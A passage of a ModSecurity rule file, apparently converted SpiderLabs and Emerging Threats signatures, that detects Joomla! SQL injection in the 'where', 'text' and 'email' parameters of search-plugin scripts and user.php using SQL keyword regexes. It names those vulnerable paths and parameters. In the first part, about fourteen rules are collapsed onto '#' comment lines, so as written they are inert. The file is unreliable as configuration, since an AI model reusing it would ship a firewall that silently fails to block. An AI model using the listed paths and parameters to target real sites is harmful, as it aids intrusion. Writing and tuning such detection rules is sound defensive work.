    SecRule ARGS:where "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005423) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- content.php where DELETE SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005423,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005424) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where ASCII SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005424,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UPDATE SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005425,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- content.php where UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where SELECT SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005426,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UNION SELECT SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005427,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- weblinks.php where UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where INSERT SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005428,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where DELETE SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005429,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- weblinks.php where ASCII SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005430,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE SecRule REQUEST_LINE "@contains /plugins/search/weblinks.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005431,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- weblinks.php where UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005432) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text SELECT SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005432,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- contacts.php text SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# NOTE(review): ARGS:text is presumably the free-text field of the search
# plugin (inferred from the /plugins/search/ path -- verify). The keyword
# patterns are unanchored, and forms such as SELECT.+FROM or INSERT.+INTO use
# an unbounded `.+`, so ordinary prose containing both words can match. Run
# these in detection-only mode and tune before letting them block.
# On a match, ctl:auditLogParts=+E adds the response-body part to the audit
# record and the final setvar copies the matched value into the TX collection;
# treat the resulting audit log as sensitive data.

# (2005433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UNION SELECT
SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005433,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005434) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text INSERT
SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005434,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- contacts.php text INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005435) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text DELETE SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005435,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005436) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text ASCII SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005436,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
# SQL Injection Attempt -- contacts.php text UPDATE
#
# Rules 2005437-2005443 share one two-step shape. The chain starter looks for
# a Joomla! search-plugin script path in REQUEST_LINE and carries the
# disruptive action (block), phase, id, rev, severity, msg and tags. The
# chained rule applies a case-insensitive keyword-pair regex to the `text`
# parameter; on a match it adds audit log part E, adds
# tx.critical_anomaly_score to tx.anomaly_score and records the matched
# variable under a per-rule TX key.
SecRule REQUEST_LINE "@contains /plugins/search/contacts.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005437,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:UPDATE.+SET)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- contacts.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005438) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text SELECT
SecRule REQUEST_LINE "@contains /plugins/search/categories.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005438,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:SELECT.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005439) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UNION SELECT
SecRule REQUEST_LINE "@contains /plugins/search/categories.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005439,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:UNION\s+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005440) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text INSERT
SecRule REQUEST_LINE "@contains /plugins/search/categories.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005440,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:INSERT.+INTO)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005441) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text DELETE
SecRule REQUEST_LINE "@contains /plugins/search/categories.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005441,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:DELETE.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005442) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text ASCII
SecRule REQUEST_LINE "@contains /plugins/search/categories.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005442,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:ASCII\(.+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005443) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE
SecRule REQUEST_LINE "@contains /plugins/search/categories.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005443,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:UPDATE.+SET)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- categories.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005444) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla!
# SQL Injection Attempt -- sections.php text SELECT
#
# Rules 2005444-2005449 test the `text` parameter of requests whose request
# line contains /plugins/search/sections.php; rule 2005450 tests the `email`
# parameter of requests whose request line contains /database/table/user.php.
# In every chain the starter holds the disruptive action and the metadata,
# and the chained regex rule performs the anomaly-score update.
SecRule REQUEST_LINE "@contains /plugins/search/sections.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005444,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:SELECT.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005445) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UNION SELECT
SecRule REQUEST_LINE "@contains /plugins/search/sections.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005445,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:UNION\s+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005446) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text INSERT
SecRule REQUEST_LINE "@contains /plugins/search/sections.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005446,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:INSERT.+INTO)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005447) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text DELETE
SecRule REQUEST_LINE "@contains /plugins/search/sections.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005447,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:DELETE.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005448) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text ASCII
SecRule REQUEST_LINE "@contains /plugins/search/sections.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005448,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:ASCII\(.+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005449) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE
SecRule REQUEST_LINE "@contains /plugins/search/sections.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005449,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:text "(?i:UPDATE.+SET)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005450) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email SELECT
SecRule REQUEST_LINE "@contains /database/table/user.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005450,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:email "(?i:SELECT.+FROM)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005451) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla!
# SQL Injection Attempt -- user.php email UNION SELECT
#
# Rules 2005451-2005455 test the `email` parameter of requests whose request
# line contains /database/table/user.php. Rules 2008685 and 2008822 use longer
# chains: several literal REQUEST_LINE tests narrow the request before the
# final parameter test. Every chained rule must match for the chain to fire.
SecRule REQUEST_LINE "@contains /database/table/user.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005451,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:email "(?i:UNION\s+SELECT)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005452) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email INSERT
SecRule REQUEST_LINE "@contains /database/table/user.php" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005452,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:email "(?i:INSERT.+INTO)" \
        "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005453) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email DELETE
SecRule REQUEST_LINE "@contains /database/table/user.php" \
